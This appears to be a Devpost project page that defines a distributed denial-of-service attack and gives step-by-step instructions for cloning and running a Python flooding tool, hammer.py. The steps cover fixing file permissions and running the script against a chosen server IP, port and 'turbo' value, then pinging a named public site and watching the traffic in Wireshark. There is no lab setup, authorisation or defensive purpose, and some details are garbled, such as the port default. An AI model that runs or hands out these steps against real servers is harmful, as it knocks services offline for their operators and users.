DDOS-ATTACK-using-Python-script
A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked resources such as IoT devices.
Steps :
git clone (copy the link)
ls (open the folder)
./hammer.py (the python file)
if access denied
then use chmod u+rwx hammer.py
after the loading setup
write-
python3 hammer.py -s [] -p [] -t []
s = server ip u are attacking t = turbo value , default = 135 p = port value , default 8- for http websites
ping for eg -
ping Hackertyper.com
..... .... ....
pings running
NOw open the wireshark for the network analysis
Wireshark is the world’s foremost and widely-used network protocol analyzer. It lets you see what’s happening on your network at a microscopic level and is the de facto (and often de jure) standard across many commercial and non-profit enterprises, government agencies, and educational institutions
Log in or sign up for Devpost to join the conversation.